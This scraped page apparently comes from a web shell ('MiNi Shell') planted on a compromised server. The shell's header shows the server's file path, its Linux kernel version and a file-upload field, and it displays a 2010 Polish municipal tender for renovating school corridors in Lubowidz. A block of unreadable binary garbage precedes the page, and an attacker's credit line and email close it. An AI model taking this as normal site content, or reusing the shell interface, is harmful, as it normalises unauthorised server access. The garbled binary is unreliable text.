JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100608/159636-N-2010.html

<p class="kh_header"><b>Lubowidz: Remont korytarzy szkoły klas 1-3 i przedszkola oraz pomieszczenia dla klasy O w Lubowidzu</b><br>
<b>Numer ogłoszenia: 159636 - 2010; data zamieszczenia: 08.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubowidz , ul. Zielona 10, 09-304 Lubowidz, woj. mazowieckie, tel. 023 6582078 w. 21, 502 482552, faks 023 6582078 w. 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ugl@uglubowidz.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont korytarzy szkoły klas 1-3 i przedszkola oraz pomieszczenia dla klasy O w Lubowidzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót

1.Zerwanie posadzek tworzyw sztucznych korytarz szkoły, przedszkola        -  119.070 m2
2.Wyrównanie podłoży betonowych przez frezowanie                      - 119.070 m2
3.Samopoziomujące masy szpachlowe typu TERPLAN-N 
gr. 2,0 mm wewnątrz budynków pod płytki z kamieni 
sztucznych, wykładziny i parkiet- wyrównanie podłoża                 - 119.070 m2
4.Samopoziomujące masy szpachlowe typu TERPLAN-N- 
dodatek za każdy 1mm grubości w zakresie 2-10 mm x3 mm        - 119.070 m2
5.Posadzki z płytek o wymiarach 30 x 30 cm, układanych 
metodą kombinowaną- płytki gres antypoślizgowe - korytarz 
szkoły                                                                                                - 61.705 m2
6.Cokoliki, z płytek o wymiarach 20x 20 cm i wysokości 
cokolika równej 10 cm                                                                      - 57.330 m2
7.Posadzki z wykładzin z tworzyw sztucznych rulowanych 
z warstwą izolacyjną z wycięciem na ściany 10 cm - wykładzina 
tarkiet niepalna z atestami, pożarowym i higienicznym - korytarz 
przedszkola z szatnią                                                                         -  60.120 m2
8.Osłony na grzejniki szczeblinowe sosnowe - demontaż - nowe, 
korytarz szkoły                                                                                   -  11.645 m2
9.Boazeria płycinowa rozbiórka                                                            - 146.029 m2
10.Przyklejenie warstwy siatki na ścianach - celem wyrównania 
powierzchni po zerwanej boazerii, oraz przygotowania 
powierzchni pod lamperię na wysokości 1,6 m 
od podłogi- cokolik                                                                            - 171.715m2
11.Osłony folią polietylenową styku ścian z tynkiem pod boazerię         - 75.000m2
12.Gładzie gipsowe gr. 3mm jednowarstwowe na ścianach 
na podłożu z tynku w pomieszczeniach o pow. podłogi 
ponad 5 m2 - powierzchnia pod lamperię i wyrównanie ścian 
do pełnej wysokości pomieszczenia                                                   - 171.715 m2
13.Dwukrotne malowanie zwykłe farbą olejną lub ftalową tynków 
bez szpachlowania w kolorach jasnych ustalonych 
z użytkowaniem - lamperia                                                                -  171.715 m2
14.Dwukrotne malowanie farbami emulsyjnymi powierzchni 
wewnętrznych - tynków gładkich bez gruntowania - sufity - 
korytarze szkoły, przedszkola,szatni przedszkola                               -  122.458 m2
15.Dwukrotne malowanie farbami emulsyjnymi starych tynków 
wewnętrznych ścian po robotach tynków pod boazerię w kolorze 
ustalonym z użytkownikiem - pomieszczenia jw.                                 - 164.137 m2
16.Jednokrotne malowanie farbą olejną uprzednio malowanej 
stolarki drzwiowej, ścianek i szafek o pow. pow 1.0m2 - drzwi 
od strony korytarzy                                                                               -  19.680 m2
17. Osłony na grzejniki szczeblinowe sosnowe- nowe szkoła 
korytarz                                                                                                  -  16.367 m2
18.Wymiana okien zespolonych na okna rozwierane i uchylno- 
rozwierane dwudzielne z PCV o pow. do 2.0 m2                                  - 18.981 m2   
19.Wymiana okien zespolonych na okna rozwierane i uchylno -
 rozwierane jednodzielne z PCV o pow. do 1.5 m2                            - 11.615 m2
20.Wymiana drzwi balkonowych zespolonych na drzwi balkonowe z PCV. - 9.292m2.

21.Wymiana okien zespolonych na naświetla jednodzielne z PCV o pow. od 1.0 m2
                                                                                                                      - 14.308m2,
22.Ramy wystawowe , elementy przegrody szatni przedszkola z osadzeniem drzwi pełnych kompletnych o szerokości 90 cm skrzydło, wypełnieniem o pow. 2.0x2,35 pustakami szklanymi i pozostałej powierzchni płytami gipsowymi oraz uzupełnieniem siatki z zaprawą klejową do wysokości lamperii                                                  -   22.500m
23.Rozebranie ścianki z cegieł o grubości ? cegły na zaprawie wapiennej  - 32.970 m2,
24.Wykucie muru ościeżnic drewnianych o pow. do 2 m2- z holu przedszkola + ścianka w kuchni + wc                                                                                                   - 3 sztuki
25.Rozebranie posadzek jednolitych cementowych, lastrykowych - kuchnia i wc - 54153m2,
26.Rozebranie podłoża z betonu żwirowego o grubości do 10 cm - jw. bez wc - 45.455m3,
27.Zdjęcie warstwy podsypki piaskowej do 15 cm - jw.                                      -45.455m3,
28.Podkłady betonowe z budownictwie mieszkaniowym i użyteczności publicznej z transportem i układaniem ręcznym na podłożu gruntowym beton B 20           -4.600m3,
29.Izolacje przeciwwilgociowe z papy zgrzewalnej w pomieszczeniach o pow. ponad 5m2
                                                                                                                          -45.997m2.
30.Izolacje cieplne i przeciwdźwiękowe z płyt styropianowych poziome na wierzchu konstrukcji na sucho - jedna warstwa gr. 10 cm - kuchnia                           - 45.997m2,
31.Warstwy wyrównawcze pod posadzki z zaprawy cementowej gr. 20 cm zatarte na gładko - sala po kuchni + wc                                                                                    - 54.695 m2,
32.Warstwy wyrównawcze pod posadzki z zaprawy cementowej- dodatek  lub potrącenie za zmianę gr. o 10mmx2 jw. bez wc                                                                  -45.997m2,
33.Skrzydła drzwiowe płytowe wewnętrzne pełne jednoskrzydłowe fabrycznie wykończone- wymiana istniejących na nowe                                                  - 6.560m2,
34.Ścianki działowe GR z płyt gipsowo-kartonowych na rusztach metalowych z pokryciem obustronnym, dwuwarstwowe 50-101 - uzupełnienie po oknach podawczych i drzwiach obustronnie, oraz łazienka nowe                                                                      - 9.964m2,
35.Posadzki jedno i dwubarwne z płytek z kamieni sztucznych 30x30 cm na zaprawie klejowej układane metodą nieregularlną - wc                                                  - 8.698m2,
36.Okładziny z płyt gipsowo-kartonowych RIGIPS na ścianach na ruszcie drewnianym - osłony rur                                                                                                         - 2.085m2,
37.Dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych - podłoży gipsowych z gruntowaniem ściany + sufit - pom. Zerówki -                        -136.727m2,
38.Wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane dwudzielne z PCV o pow. do 2.o m2                                                                                    - 5.177m2,
39.Wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane jednodzielne z PCV o pow. do 1,5 m2,                                                                                    - 5.162m2,
40.Wymiana drzwi drewnianych na drzwi balkonowe z PCV.                             - 2.088m2,
41.Wymiana okien zespolonych na naświetla jednodzielne z PCV o pow. do 1.0m2-3.993m2,
42.Posadzki z wykładzin z tworzyw sztucznych rulonowych z warstwą izolacyjną z 
wywinięciem na ściany 10 cm - wykładzina tarkiet niepalna z atestami pożarowymi i higienicznymi - sala O                                                                                - 48.889m2,
43.Licowanie  ścian o pow. ponad 5m2 płytkami glazurowymi o wym. 20x25 cm na zaprawie klejowej ATLAS- łazienka + uzupełnienia na sali lekcyjnej        - 42.618 m2,
44.Demontaż rurociągu stalowego ocynkowanego o śr. 15-20mm                   - 10.000m,
45.Baterie umywalkowe lub zmywakowe ścienne o śr. nom. 15mm                - 3. 000 m2
46.Rurociągi w instalacjach wodociągowych o śr. nomin. 15mm stalowe ocynkow.
o połącz. dwintow. ,   na ścianach w bud. niemieszkalnych                      - 8.000 m2
47.Demontaż rurociągu żeliwnego kanalizacyjnego o śr. 50-100 mm - na ścianach
budynku                                                                                                           - 3.000 m 2
48.Rurociągi z PCV kanalizacyjne o śr.110 mm na ścianach w budynkach niemieszkalnych o połączeniach wciskowych                                                                         - 2.500 m 2
49.Montaż umywalek pojedynczych porcelanowych z syfonem gruszkowym - 2szt. Wc 1szt sala O                                                                                                 - 3.000 m2
50.Dodatek za wykonanie podejść odpływowych z rur i kształtek z nieplastyfikowanych PCW o śr. 110 mm                                                                                        - 2.000 m2
51.Ustępy z płuczką ustępową typu -kopmpakt- model dla dzieci                 - 2.000 m 2
52.Demontaż podejścia odpływowego z rur stalowych o śr. 50 mm                 - 3.000 m 2
53.Demontaż zlewu kuchennego                                                                       - 4.000 m 2
54.Szafki hydrantowe naścienne - wymiana na nowe kompletne Dn -  25 z wężem półsztywnym długości 30 m                                                                          - 2.000 m2
55.Konwektory stalowe o mocy cieplnej powyżej 5 000 W wymiana - sala 0 - 3.000 m 2
56.Konwektory stalowe o mocy cieplnej 2500 W - wc                                      - 1000 m2
57.Demontaż opraw żarowych porcelanowych lub plafonier przykręcanych  - 10.000 m 3
58.Montaż z podłączeniem na gotowym podłożu opraw świetlówkowych sufitowych na podwieszonych sufitach 4x 40 W - w tym 2szt z oświetleniem ewakuacyjnym  
                                                                                                                        - 8. 000 m3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.45.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 2.000 zł (słownie: dwa tysiące   złotych). Wykonawca, który nie wniósł wadium, zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych , o wartości robót co najmniej 70 000,00 zł. brutto  (wg załącznika nr 5 do siwz) wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, posiadających uprawnienia budowlane do kierowania robotami budowlanymi , wpisanych do właściwej izby inżynierów budownictwa,  . Wykonawca złoży oświadczenie, ze w/w osoby posiadają wymagane uprawnienia budowlane.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, posiadających uprawnienia budowlane do kierowania robotami budowlanymi , wpisanych do właściwej izby inżynierów budownictwa, Wykonawca złoży oświadczenie, ze w/w osoby posiadają wymagane uprawnienia budowlane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wpłacenia wadium
2. Kosztorys ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> uglubowidz.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Lubowidzu
09-304 LUBOWIDZ ul. Zielona 10 - pokój nr 2 - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2010 godzina 10:00, miejsce: Urząd Gminy w Lubowidzu
09-304 LUBOWIDZ ul. Zielona 10 - pokój nr 2 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com